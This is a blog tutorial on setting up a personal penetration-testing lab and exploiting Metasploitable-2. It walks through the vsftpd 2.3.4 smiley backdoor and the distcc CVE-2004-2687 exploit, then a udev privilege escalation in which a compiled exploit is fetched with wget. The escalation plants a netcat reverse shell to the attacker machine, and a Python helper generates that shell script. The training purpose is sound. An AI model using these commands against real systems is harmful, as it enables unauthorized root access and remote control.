Basic Penetration testing lab — 1

I am setting up a new lab for myself and thought I would document the process, so anyone who wants to do the same can use this post as a reference. I am writing this one from scratch and will add more parts as I move forward.


  1. Downloading all the things.
  2. Creating Virtual machines
  3. Configuring Virtual machines
  4. Reconnaissance
  5. Exploiting Common vulnerabilities — Metasploitable-2
  6. Credits

1. Downloading all the Things.

2. Creating Virtual Machines.

Parrot OS

Click on “Install from disc or image”, locate your ISO and accept the default configuration; you can choose memory and disk size according to your needs.

Provide the location of the Parrot OS ISO.

You can use “live mode” or install it. I preferred the installed version.


The installation process for the second machine, Metasploitable-2, is similar to ParrotOS.

You can provide memory and disk size according to your needs, but keep the host machine's resources in mind when choosing custom values: both VMs will be running at the same time.

3. Configuring Virtual Machines

For a penetration testing lab the machines need to be able to reach each other over the network. To do that, select “Bridged” in the VM network settings, which puts both VMs on the same LAN as the host.

Keep in mind that bridged mode also exposes Metasploitable-2, which is intentionally vulnerable, to everything else on that LAN. A host-only network gives the same VM-to-VM connectivity without that exposure; choose whichever mode suits your requirements.


4. Reconnaissance

Startup both machines ParrotOS & Metasploitable-2.


Log in to Metasploitable-2 with the following credentials.

Username: msfadmin
Password: msfadmin

Find the local IP address of Metasploitable-2; it is needed for every scan and exploit command below.


Metasploitable-2 local IP:


Log in to ParrotOS with your credentials.

Default credentials for ParrotOS:

Username: user

Password: toor

Find the IP address for ParrotOS using the following command.


ParrotOS local IP:

Port scanning Metasploitable-2 using ParrotOS

nmap -A -oX /home/ehsahil/Desktop/metasploit2-nmap-scan.xml <Metasploitable-2 IP>

-A turns on OS and version detection, default scripts and traceroute; -oX writes the results as XML. Replace <Metasploitable-2 IP> with the address found above.

The output is in XML, so let's convert it into something easier to read.

For this we use a utility called “xsltproc”, which applies the nmap.xsl stylesheet referenced inside the XML and turns the report into HTML. Give the output a .html name; pointing -o at the .xml input would overwrite the scan you are converting.

xsltproc /home/ehsahil/Desktop/metasploit2-nmap-scan.xml -o /home/ehsahil/Desktop/metasploit2-nmap-scan.html

5. Exploiting Common Vulnerabilities.

Metasploitable — 2

1. Exploiting vsftpd 2.3.4

2. Exploiting Distcc V1 — CVE-2004–2687

1. Exploiting vsftpd 2.3.4.

Aim: Exploit VSFTPD daemon and obtain root access.

Scanning port 21 with nmap:

nmap -sV -p 21 <Metasploitable-2 IP>

Port 21 is open and running vsftpd version 2.3.4.

Searching online for a publicly available exploit for this particular version (search terms used):

vsftp 2.3.4 exploits

Exploiting manually.

Connect to the FTP service on Metasploitable-2 and log in with a username that ends in a smiley:

Username: ehsahil:)
Password: nothing, just press Enter

The :) at the end of the username is what triggers the backdoor; the rest of the username does not matter. Do not wait for the login to succeed: a backdoored daemon never answers it, because it goes off to listen on another port instead.

That port is 6200, where the backdoor sets up a bind shell, so connect to it with netcat from ParrotOS:

nc -vvn <Metasploitable-2 IP> 6200

Exploiting using Metasploit.

Start Metasploit with the msfconsole command.


Metasploit Commands.

search vsftpd

use exploit/unix/ftp/vsftpd_234_backdoor

show options

Set the target host option shown by show options (RHOST or RHOSTS, depending on your Metasploit version) to the Metasploitable-2 IP and run the module; the session it returns is the same root shell on port 6200 that the manual method reaches.



Background: the source archive for this version of vsftpd was replaced with a backdoored copy on the project's download site for a short time in 2011. The developers noticed and removed it, but anyone who downloaded 2.3.4 during that window got the backdoor.

The backdoor is triggered when the username sent during the FTP login contains :) (a smiley face). The daemon then sets up a bind shell listener on port 6200, running with the daemon's root privileges.

Vulnerable Source code:

Detailed Source code review:

2. Exploiting Vulnerable DISTCC — CVE-2004–2687

Aim: getting root access on the machine.

distccd v1 is a known vulnerable service on Metasploitable-2, and it is interesting because the exploit only gives a shell as an unprivileged user; we then have to escalate that user to root with a separate privilege escalation.

Searching about distcc on online

distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project’s compilation time.

distccd runs on port 3632.

Running nmap against port 3632:

nmap -sV -p 3632 <Metasploitable-2 IP>

Searching for a public exploit for distccd v1:

Vulnerable to: CVE-2004–2687

An exploit is publicly available (Metasploit ships one).

Exploiting using Metasploit.


Metasploit commands:

search distcc

use exploit/unix/misc/distcc_exec

show options



The module returns a shell, but id shows uid=1(daemon) and we cannot cat /etc/shadow, which tells us we do not have root privileges yet.

We need to leverage another vulnerability in the installed components.

To find one we apply the recon process to the system itself.

Seeing all the shells available to us.

cat /etc/shells

GCC — Used for compiling exploits

which gcc

WGET — Used to download the exploit in the vulnerable machine

which wget

Let's see all the running processes:

ps aux

From this process list we could go looking for publicly available exploits for each component.

But, as we are using Metasploitable-2, we already know which component is vulnerable, so we will use that.

The vulnerable component is “udev”; grep for it in the ps aux output to confirm it is running.

Searching for exploits on searchsploit

searchsploit udev

We are interested in the exploit for “local privilege Escalation(2) — /exploits/linux/local/8572.c”

cat /usr/share/exploitdb/exploits/linux/local/8572.c

Exploit usage.

Steps for escalating from daemon to root. Steps 1 and 2 run on ParrotOS, which serves the exploit over HTTP; the remaining steps run in the distcc shell on Metasploitable-2 unless stated otherwise.

  1. Start the local Apache server (apache2) on ParrotOS:

service apache2 start

2. Copy the exploit into Apache's public directory.

Exploit directory: /usr/share/exploitdb/exploits/linux/local/

Apache's public directory: /var/www/html

sudo cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/ehsahil.c

3. Fetch the exploit on the vulnerable machine with wget, using the ParrotOS IP.

ParrotOS IP:

cd /tmp
wget http://<ParrotOS IP>/ehsahil.c

Our exploit code “ehsahil.c” is now in the /tmp directory.

4. Create the run file in /tmp, which the exploit makes udev execute as root (8572.c hard-codes /tmp/run, so stay in /tmp):

touch run #creating run file required by the exploit

#shell script to get the reverse shell; <ParrotOS IP> is where our listener will be
echo '#!/bin/sh' > run
echo '/bin/netcat -e /bin/bash <ParrotOS IP> 5555' >> run

5. Compiling our exploit code.

gcc ehsahil.c -o ehsahil

6. On ParrotOS, listen on port 5555 for the reverse shell:

nc -lvnp 5555

7. Find the PID of the udev netlink socket. In /proc/net/netlink it is the Pid column of the row whose Eth (protocol) column is 15, i.e. NETLINK_KOBJECT_UEVENT, and whose Pid is not 0; it is usually udevd's PID minus one.

cat /proc/net/netlink

PID of the udev netlink socket = 2718

8. Make the compiled exploit executable:

chmod 755 ehsahil

9. Run the exploit with that PID:


./ehsahil 2718

A root reverse shell arrives on the ParrotOS listener from step 6.
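Steps 4 and 7 are the two places where it is easy to pick the wrong value, so here is the check done in Python: pick the udev socket PID out of a copy of /proc/net/netlink and generate the /tmp/run contents with the listener address filled in. This is an added example, not code from the original post; NETLINK_TABLE is a constructed copy of what cat /proc/net/netlink prints, reusing the 2718 found above, and the ParrotOS address is an assumption. The Python on Metasploitable-2 is too old for this script, so run it on ParrotOS against a pasted copy of the table.

```python
"""Find the udev netlink socket PID and build /tmp/run for 8572.c.

Added example, not from the original post. NETLINK_TABLE is a constructed
/proc/net/netlink listing with the same 2718 the post found; the attacker
address is an assumed ParrotOS lab IP.
"""
NETLINK_KOBJECT_UEVENT = 15  # the "Eth" (protocol) column value udevd binds to

NETLINK_TABLE = """\
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
ddf0e800 0   0      00000000 0        0        00000000 2
dd5fec00 4   0      00000000 0        0        00000000 2
df1bc400 7   0      00000000 0        0        00000000 2
dd5fe000 10  0      00000000 0        0        00000000 2
df1bcc00 15  0      00000000 0        0        00000000 2
dd5fe400 15  2718   00000001 0        0        00000000 2
de9a2800 16  0      00000000 0        0        00000000 2
"""


def uevent_socket_pids(table):
    """Return PIDs of user-space sockets bound to NETLINK_KOBJECT_UEVENT.

    Rows with Pid 0 are the kernel side of the protocol; 8572.c wants the
    user-space one, which on Metasploitable-2 belongs to udevd.
    """
    pids = []
    for line in table.splitlines()[1:]:  # first line is the column header
        cols = line.split()
        if len(cols) < 3:
            continue
        proto, pid = int(cols[1]), int(cols[2])
        if proto == NETLINK_KOBJECT_UEVENT and pid != 0:
            pids.append(pid)
    return pids


def run_script(attacker_ip, port=5555):
    """Contents of /tmp/run, the file udev is tricked into executing as root."""
    return "#!/bin/sh\n/bin/netcat -e /bin/bash %s %d\n" % (attacker_ip, port)


def choose_pid(table):
    """The PID to pass to the compiled exploit, or None if there is no candidate."""
    pids = uevent_socket_pids(table)
    return pids[0] if pids else None


if __name__ == "__main__":
    import sys
    # Usage: python3 udev_pid.py [netlink-table-file] [ParrotOS IP]
    table = open(sys.argv[1]).read() if len(sys.argv) > 1 else NETLINK_TABLE
    attacker = sys.argv[2] if len(sys.argv) > 2 else "192.0.2.20"  # assumed ParrotOS IP
    pids = uevent_socket_pids(table)
    if not pids:
        sys.exit("no user-space NETLINK_KOBJECT_UEVENT socket: is udevd running?")
    if len(pids) > 1:
        print("several candidates %s; compare with the udevd PID from ps aux" % pids)
    print("--- write this to /tmp/run and chmod +x it ---")
    print(run_script(attacker), end="")
    print("--- then, from /tmp ---")
    print("./ehsahil %d" % pids[0])
```

If more than one row matches, compare the candidates with udevd's PID from ps aux; the socket PID is normally that PID minus one.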

I will post more metasploitable2 common exploits as I practice them.


RWB NetSec

Feedback? hit me on twitter @ehsahil

Until Next time.

Written on September 16, 2018